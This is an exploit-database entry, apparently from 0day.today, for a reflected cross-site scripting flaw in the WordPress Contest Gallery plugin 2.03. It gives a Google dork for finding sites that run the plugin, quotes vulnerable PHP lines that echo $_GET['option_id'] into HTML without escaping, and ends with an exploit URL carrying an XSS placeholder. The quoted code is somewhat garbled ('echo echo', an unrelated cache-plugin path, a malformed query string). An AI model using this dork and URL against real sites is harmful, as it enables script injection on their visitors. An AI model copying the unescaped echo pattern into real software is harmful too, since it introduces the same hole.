Wordpress Contest Gallery plugin XSS Vulnerability

2015-12-01T00:00:00
ID 1337DAY-ID-24641
Type zdt
Reporter sniper.t
Modified 2015-12-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################################################################
# Exploit Title: Wordpress plugin contest-gallery  XSS Vulnerability
# Software Link: https://wordpress.org/plugins/contest-gallery/
#Version:2.03
# Google dork: inurl:/wp-content/plugins/contest-gallery
######################################################################
 
 The code in ./wp-fastest-cache/contest-gallery/nav-gallery.php
 

            31: echo echo "<td align='center'><br/><div><form method='POST' action='?page=contest-gallery/index.php&define_upload=true&option_id=$GalleryID'><input type='hidden' name='option_id' value='$GalleryID'><input type='submit' value='Edit upload form' style='text-align:center;width:180px;background:linear-gradient(0deg, #bbe0ef 5%, #90d4f0 70%);' /></form><br/></div></td>";  // nav-gallery.php
        39: $GalleryID = $nextIDgallery;  // get-data.phpif($createdGallery), 
        36: $GalleryID = $_GET['option_id'];  // get-data.php
        39: $GalleryID = $nextIDgallery;  // get-data.phpif($createdGallery), 
        36: $GalleryID = $_GET['option_id'];  // get-data.php


 
 
Exploit
http://server/wp-content/plugins/contest-gallery/admin/nav-gallery.php?action=?page=contest-gallery/index.php&define_upload=true&option_id=&GalleryID==/*XSS_HERE*/


#  0day.today [2018-01-01]  #